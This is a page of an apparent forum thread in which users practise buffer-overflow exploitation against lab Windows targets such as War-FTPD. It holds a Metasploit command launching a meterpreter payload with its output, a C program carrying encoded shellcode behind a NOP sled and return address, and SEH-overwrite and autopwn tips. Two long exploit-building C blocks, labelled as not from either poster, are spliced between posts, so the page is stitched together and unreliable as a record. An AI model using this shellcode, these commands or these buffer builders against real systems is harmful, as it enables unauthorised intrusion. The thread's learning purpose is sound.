Page 6 of 10, results 51 to 60 of 97

Thread: Recreating Buffer Overflow

  1. #51
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

OK, forget about PassiveX.

    Framework user's guide:
    "The PassiveX payloads will only work when the target system has Internet Explorer 6.0 installed (not 5.5 or 7.0)"

    But any luck with win32_reverse_vncinject?

  2. #52
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by Armagedeon View Post
    UnnamedOne

    Try using my ret \x50\x69\xC9\x74


    l1nuxant_ee

I've achieved success with TFTPServerSPInstallerV1.41.
    If you want, I can post my scripts...
    But now I have a new doubt.
    I'm trying the Msfweb (Metasploit) interface to launch automated exploits.
    I'm trying win32_reverse_vncinject against War-FTPD 1.65... because it has an automated payload for XP SP2.
    I can see that a courtesy shell appears on the victim, but no VNC window shows up on my attacking machine; could you please try it to see whether you achieve success?
    Get back to me when you can. Thanks

    P.S.- By the way, could you try PassiveX too? I wasn't able to use it... Is there a patch in XP SP2 against PassiveX?

    This is my prompt:

    Code:
    bt framework2 # ./msfcli warftpd_165_user RHOST=YYY.YYY.YYY.YYY PAYLOAD=win32_passivex_meterpreter TARGET=3 PXHTTPHOST=XXX.XXX.XXX.XXX PXHTTPPORT=80 E
    [*] Starting PassiveX Handler on XXX.XXX.XXX.XXX:80.
    [*] Trying Windows XP SP2 English using return address 0x71ab9372....
    [*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
    [*] Sending evil buffer....
    [*] Sending PassiveX main page to client...
    [*] Sending PassiveX DLL in HTTP response (106496 bytes)...
    [*] Exiting PassiveX Handler.#

Well done. Really, I haven't tried it yet.
    From the previous one I was interested in learning the short jump command and when to use it, and also how to check the SEH handler.
    BTW, I used jmp EBP in it instead of jmp ESI, and it worked.

    If you can, post your thoughts on the last exploit: what you learnt from it, what was difficult.

  3. #53
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

Hi, I tried creating a program and then overflowing the buffer with the code below. When I run it in OllyDbg, ECX fills up with FFFFFFFF and then starts counting down until FFFFFFE0, and then it moves to 0000061.
    Any guidance please.

Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <conio.h>

    int main()
    {
        /* 10-byte destination; the source buffer below deliberately overflows it */
        char store[10];
        /* layout: 'a' padding | return address 0x77e2bd5c (little-endian) | NOP sled | encoded shellcode */
        char overflow[10000] = {"aaaaaaaaaaaaaaaaaaaa\x5c\xbd\xe2\x77\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xba\xb4\x9a\x03\x83\xeb\xfc\xe2\xf4\x46\xde\x71\x4e\x52\x4d\x65\xfc\x45\xd4\x11\x6f\x9e\x90\x11\x46\x86\x3f\xe6\x06\xc2\xb5\x75\x88\xf5\xac\x11\x5c\x9a\xb5\x71\x4a\x31\x80\x11\x02\x54\x85\x5a\x9a\x16\x30\x5a\x77\xbd\x75\x50\x0e\xbb\x76\x71\xf7\x81\xe0\xbe\x2b\xcf\x51\x11\x5c\x9e\xb5\x71\x65\x31\xb8\xd1\x88\xe5\xa8\x9b\xe8\xb9\x98\x11\x8a\xd6\x90\x86\x62\x79\x85\x41\x67\x31\xf7\xaa\x88\xfa\xb8\x11\x73\xa6\x19\x11\x43\xb2\xea\xf2\x8d\xf4\xba\x76\x53\x45\x62\xfc\x50\xdc\xdc\xa9\x31\xd2\xc3\xe9\x31\xe5\xe0\x65\xd3\xd2\x7f\x77\xff\x81\xe4\x65\xd5\xe5\x3d\x7f\x65\x3b\x59\x92\x01\xef\xde\x98\xfc\x6a\xdc\x43\x0a\x4f\x19\xcd\xfc\x6c\xe7\xc9\x50\xe9\xe7\xd9\x50\xf9\xe7\x65\xd3\xdc\xdc\x8b\x5f\xdc\xe7\x13\xe2\x2f\xdc\x3e\x19\xca\x73\xcd\xfc\x6c\xde\x8a\x52\xef\x4b\x4a\x6b\x1e\x19\xb4\xea\xed\x4b\x4c\x50\xef\x4b\x4a\x6b\x5f\xfd\x1c\x4a\xed\x4b\x4c\x53\xee\xe0\xcf\xfc\x6a\x27\xf2\xe4\xc3\x72\xe3\x54\x45\x62\xcf\xfc\x6a\xd2\xf0\x67\xdc\xdc\xf9\x6e\x33\x51\xf0\x53\xe3\x9d\x56\x8a\x5d\xde\xde\x8a\x58\x85\x5a\xf0\x10\x4a\xd8\x2e\x44\xf6\xb6\x90\x37\xce\xa2\xa8\x11\x1f\xf2\x71\x44\x07\x8c\xfc\xcf\xf0\x65\xd5\xe1\xe3\xc8\x52\xeb\xe5\xf0\x02\xeb\xe5\xcf\x52\x45\x64\xf2\xae\x63\xb1\x54\x50\x45\x62\xf0\xfc\x45\x83\x65\xd3\x31\xe3\x66\x80\x7e\xd0\x65\xd5\xe8\x4b\x4a\x6b\x4a\x3e\x9e\x5c\xe9\x4b\x4c\xfc\x6a\xb4\x9a\x03"};
        strcpy(store, overflow);   /* unbounded copy: runs past store[] and over the saved return address */
        return 0;
    }

In the bottom right of OllyDbg the address is 0012d898 at the last of the 0x90s.

  4. #54
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

I have changed my code around a bit: "AAAAAAAAAAAA" + "\xac\xfd\x12\x00" + "about 20 NOPs" + shellcode.
    The \xac\xfd... points to the middle of the NOPs, and in the debugger it gets directed to them and then to the shellcode, but I still don't get a shell. The program crashes. The overflow buffer goes into an 8-char buffer.

    Thanks
    James

  5. #55
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by compaq View Post
I have changed my code around a bit: "AAAAAAAAAAAA" + "\xac\xfd\x12\x00" + "about 20 NOPs" + shellcode.
    The \xac\xfd... points to the middle of the NOPs, and in the debugger it gets directed to them and then to the shellcode, but I still don't get a shell. The program crashes. The overflow buffer goes into an 8-char buffer.

    Thanks
    James
Well, I would advise starting in an incremental fashion when trying to exploit. I mean, make your buffer contain only A's. If you get a crash, try to find where your EIP is filled. Then try to put a suitable jmp in EIP, and use "\xCC" instead of your shellcode (the "\xCC" is for debugging), so if your jmp works correctly, in Olly you should jump into your "\xCC"; then replace the "\xCC" with your shellcode, and it should work.
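The staged approach described in the reply above, and the delivery problem in the post it answers, as an added example that is not code from either poster: a cyclic pattern locates the EIP offset from the value the debugger shows, a bad-byte check runs over the assembled buffer before it is sent, and INT3 (0xCC) bytes stand in for the shellcode. The EIP value 0x41326141 is constructed for the demonstration; the return address 0x0012fdac is the one from the previous post, and its high byte is 0x00, which matters because strcpy() stops at the first NUL, so anything after that address in the source never reaches the stack.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Cyclic pattern in the style of Metasploit's pattern_create (Aa0Aa1Aa2...):
 * every 4-byte window is unique within the first 20280 bytes, so the value
 * that lands in EIP identifies the overwrite offset. */
size_t pattern_create(uint8_t *out, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                const char chunk[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = (uint8_t)chunk[i];
            }
    return n;
}

/* Offset of the 4 pattern bytes that the debugger shows in EIP after the crash.
 * EIP is little-endian, so 0x41326141 means the bytes 41 61 32 41 ("Aa2A"). */
long pattern_offset(uint32_t eip, const uint8_t *pat, size_t len)
{
    const uint8_t needle[4] = { (uint8_t)(eip & 0xff), (uint8_t)((eip >> 8) & 0xff),
                                (uint8_t)((eip >> 16) & 0xff), (uint8_t)((eip >> 24) & 0xff) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Index of the first byte the delivery path cannot carry, or -1 if none.
 * For a strcpy()-based overflow the bad byte is 0x00: the copy stops there,
 * so nothing placed after it in the source buffer reaches the stack. */
long first_bad_byte(const uint8_t *buf, size_t len, const uint8_t *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* One stage of the buffer: 'A' * offset | return address (little-endian) |
 * NOP sled | payload. Returns the total length, or 0 if it does not fit. */
size_t build_stage(uint8_t *out, size_t cap, size_t offset, uint32_t ret,
                   size_t nops, const uint8_t *payload, size_t plen)
{
    size_t need = offset + 4 + nops + plen;
    if (need > cap)
        return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 4; i++)
        out[offset + i] = (uint8_t)(ret >> (8 * i));
    memset(out + offset + 4, 0x90, nops);
    memcpy(out + offset + 4 + nops, payload, plen);
    return need;
}

/* Stage 1: the offset recovered from a constructed EIP value (0x41326141
 * stands in for whatever OllyDbg shows after the pattern crash). */
long demo_offset(void)
{
    static uint8_t pat[2048];
    size_t n = pattern_create(pat, sizeof pat);
    return pattern_offset(0x41326141, pat, n);   /* 6 */
}

/* Stage 2: INT3 (0xCC) breakpoints in place of shellcode, using the return
 * address 0x0012fdac from the post above. Returns the index of its 0x00 byte:
 * strcpy() writes that byte as the terminator and drops everything after it,
 * so the NOPs and the INT3s never land in the stack frame. */
long demo_first_nul(void)
{
    static uint8_t stage[2048];
    uint8_t int3[8];
    const uint8_t nul = 0x00;
    memset(int3, 0xCC, sizeof int3);
    size_t n = build_stage(stage, sizeof stage, 6, 0x0012fdac, 16, int3, sizeof int3);
    return n ? first_bad_byte(stage, n, &nul, 1) : -1;   /* 9 */
}

int main(void)
{
    printf("EIP offset from pattern: %ld\n", demo_offset());
    printf("first NUL in stage buffer: index %ld\n", demo_first_nul());
    return 0;
}
```

Run the bad-byte check against every stage before sending it: an address that contains 0x00 can only ever be the last four bytes of a strcpy()-delivered buffer, which rules out a NOP sled and shellcode placed after it.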

  6. #56
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Hi there l1nuxant_ee

Basically what I understood from it was that the small jump overwrites the pointer to the next SEH handler; the following 4 bits should be your ret to your shellcode.
    You use this kind of exploit when you see that your buffer overwrote one of those sections that contained a SEH handler...
    How is it going with TFTPServerSPInstallerV1.41??
    That one is an interesting one too...

    Concerning win32_reverse_vncinject against War-FTPD 1.65 with the msfweb interface, I couldn't achieve success; it crashed the server every time, but opened a shell....
    Well, I decided to try it with another FTP server, CesarFTP, and finally achieved success with that payload...

    Moving on... I'm now toying around with "autopwn", a great tool, except it never manages to give me a shell...
    I've tried it with WarFTP, CesarFTP and an Apache server that was vulnerable...
    I'm able to launch successful attacks against these applications, as you have seen, but "autopwn" isn't.
    Have you tried it before?

    Best regards.
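The SEH overwrite layout summarised in the post above, as an added example that is not code from the poster: the next-SEH slot receives a 2-byte short jump plus two NOPs, the 4-byte handler slot that follows receives the address of a pop/pop/ret gadget, and the shellcode sits directly after the handler slot. The code encodes the jump displacement (rel8 is measured from the end of the 2-byte instruction, hence EB 06 to hop 8 bytes), builds the frame, and models the dispatch path to confirm where execution lands. The gadget address 0x7c9d9f0c is a hypothetical placeholder; a real one must be a pop/pop/ret in a module loaded without SafeSEH, which on XP SP2 is the constraint that decides whether this technique works at all.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void put_le32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* "jmp short" (EB rel8). The target is given as a byte offset from the START
 * of the jmp; the CPU measures rel8 from the END of the 2-byte instruction,
 * so rel8 = target - 2. Returns 0 on success, -1 if the hop is out of range. */
int encode_short_jmp(uint8_t out[2], long target_from_jmp_start)
{
    long rel = target_from_jmp_start - 2;
    if (rel < -128 || rel > 127)
        return -1;
    out[0] = 0xEB;
    out[1] = (uint8_t)(int8_t)rel;
    return 0;
}

/* SEH overwrite layout:
 *   [padding][nSEH: EB 06 90 90][SEH: handler address][shellcode]
 * The jmp at nSEH hops 8 bytes (2 for itself, 2 NOPs, 4 for the handler slot)
 * and lands on the first shellcode byte. Returns the frame length, or 0. */
size_t build_seh_frame(uint8_t *out, size_t cap, size_t nseh_off, uint32_t handler,
                       const uint8_t *sc, size_t sclen)
{
    size_t need = nseh_off + 8 + sclen;
    if (need > cap)
        return 0;
    memset(out, 'A', nseh_off);
    if (encode_short_jmp(out + nseh_off, 8) != 0)
        return 0;
    out[nseh_off + 2] = 0x90;
    out[nseh_off + 3] = 0x90;
    put_le32(out + nseh_off + 4, handler);
    memcpy(out + nseh_off + 8, sc, sclen);
    return need;
}

/* Model of what happens once the overwritten record is used: the dispatcher
 * calls the address in the SEH slot; a pop/pop/ret gadget there returns into
 * the nSEH slot, whose short jmp is then executed. Returns the buffer offset
 * execution reaches, or -1 if the frame is not shaped as expected. */
long simulate_seh_dispatch(const uint8_t *buf, size_t len, size_t nseh_off, uint32_t gadget)
{
    if (nseh_off + 8 > len)
        return -1;
    if (get_le32(buf + nseh_off + 4) != gadget)   /* SEH slot must hold the gadget */
        return -1;
    if (buf[nseh_off] != 0xEB)                     /* nSEH must start with jmp short */
        return -1;
    long landing = (long)nseh_off + 2 + (int8_t)buf[nseh_off + 1];
    if (landing < 0 || (size_t)landing >= len)
        return -1;
    return landing;
}

/* rel8 byte of the nSEH jump: 6 */
int demo_jmp_rel8(void)
{
    uint8_t jmp[2];
    return encode_short_jmp(jmp, 8) == 0 ? jmp[1] : -1;
}

/* Constructed frame: nSEH 20 bytes in, hypothetical gadget address 0x7c9d9f0c
 * (a placeholder, not a real pop/pop/ret), shellcode replaced by INT3 bytes.
 * Returns the landing offset, which must equal the shellcode start (28). */
long demo_seh_landing(void)
{
    static uint8_t frame[256];
    uint8_t int3[8];
    memset(int3, 0xCC, sizeof int3);
    size_t n = build_seh_frame(frame, sizeof frame, 20, 0x7c9d9f0c, int3, sizeof int3);
    if (n == 0)
        return -1;
    long landing = simulate_seh_dispatch(frame, n, 20, 0x7c9d9f0c);
    return (landing >= 0 && frame[landing] == 0xCC) ? landing : -1;
}

int main(void)
{
    printf("nSEH jmp bytes: eb %02x\n", demo_jmp_rel8());
    printf("execution lands at offset %ld\n", demo_seh_landing());
    return 0;
}
```

In the debugger the check is the same as the code's model: break on the gadget address, step through the two pops and the ret, and confirm EIP comes to rest on the EB 06 in the nSEH slot and then on the first shellcode byte.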

  7. #57
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by Armagedeon View Post
    Hi there l1nuxant_ee

Basically what I understood from it was that the small jump overwrites the pointer to the next SEH handler; the following 4 bits should be your ret to your shellcode.
    You use this kind of exploit when you see that your buffer overwrote one of those sections that contained a SEH handler...
    How is it going with TFTPServerSPInstallerV1.41??
    That one is an interesting one too...

    Concerning win32_reverse_vncinject against War-FTPD 1.65 with the msfweb interface, I couldn't achieve success; it crashed the server every time, but opened a shell....
    Well, I decided to try it with another FTP server, CesarFTP, and finally achieved success with that payload...

    Moving on... I'm now toying around with "autopwn", a great tool, except it never manages to give me a shell...
    I've tried it with WarFTP, CesarFTP and an Apache server that was vulnerable...
    I'm able to launch successful attacks against these applications, as you have seen, but "autopwn" isn't.
    Have you tried it before?

    Best regards.
I will be working on the TFTP Windows Server.

    Regarding autopwn, I have worked with it. If you got a successful attack, a session should be returned to you. To check whether you have any active sessions, type:
    Code:
    sessions -l
    This will list your active sessions.
    To use one of the listed sessions, type:
    Code:
    sessions -i %
    where % represents the number of the session (such as 1, 2, ...).

    Try it, and tell me what happens.

    BTW, hard luck on Portugal going out of Euro 2008.

  8. #58
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Hello l1nuxant_ee

Please let's not talk about catastrophes.... (Portugal out of Euro 2008)
    Our goalkeeper sucks.... but the coach loved him....

    Concerning Autopwn, I ran the command "sessions -l" but it returned no sessions..
    I don't understand it...
    I'm able to launch attacks via the Metasploit web interface and via the console; my understanding of Autopwn is that it should do the same, but automatically...
    In an exploit the only thing that changes is the return addresses of the libraries, which are supposed to be static across service packs, so since Nmap detects my OS as XP SP0/SP1, and since Autopwn is using the same exploits that come with the Framework, Autopwn should be able to launch them successfully against my applications, since I'm able to do the same; it shouldn't matter that I'm running XP SP2, or should it??

    Is my line of thought incorrect?? Could you please comment.

  9. #59
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by Armagedeon View Post
    Hello l1nuxant_ee

Please let's not talk about catastrophes.... (Portugal out of Euro 2008)
    Our goalkeeper sucks.... but the coach loved him....

    Concerning Autopwn, I ran the command "sessions -l" but it returned no sessions..
    I don't understand it...
    I'm able to launch attacks via the Metasploit web interface and via the console; my understanding of Autopwn is that it should do the same, but automatically...
    In an exploit the only thing that changes is the return addresses of the libraries, which are supposed to be static across service packs, so since Nmap detects my OS as XP SP0/SP1, and since Autopwn is using the same exploits that come with the Framework, Autopwn should be able to launch them successfully against my applications, since I'm able to do the same; it shouldn't matter that I'm running XP SP2, or should it??

    Is my line of thought incorrect?? Could you please comment.
You are correct on that. The idea of autopwn is to load known exploits based on the result returned by Nmap, to try these exploits, and to assign sessions if an exploit succeeds.

    How are you using autopwn? Do you use it through Fast|Track? If so, have you updated autopwn??

  10. #60
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Hello l1nuxant_ee

After I installed Win2k and Win XP SP1 in VMware I obtained success with the PassiveX payload, and Autopwn was able to launch successful exploits against the XP SP1 box.
    Nevertheless, Autopwn still stalls in the middle of some exploits. I have used Autopwn alone and I have used Fast|Track and told it to update itself, but it still crashes or stalls for so long that I decide to hit Return to go back to the console... But at least now it obtained three shells on the unpatched XP SP1.
    I still haven't tried it against the XP SP2 box, but I haven't quit yet.

    When you are finished with TFTPServerSPInstallerV1.41 we have to talk about CesarFTP 0.99g; this one has me stunned, I hit a dead end and don't know how to deal with it... Need your help, but it can wait.
    Best regards

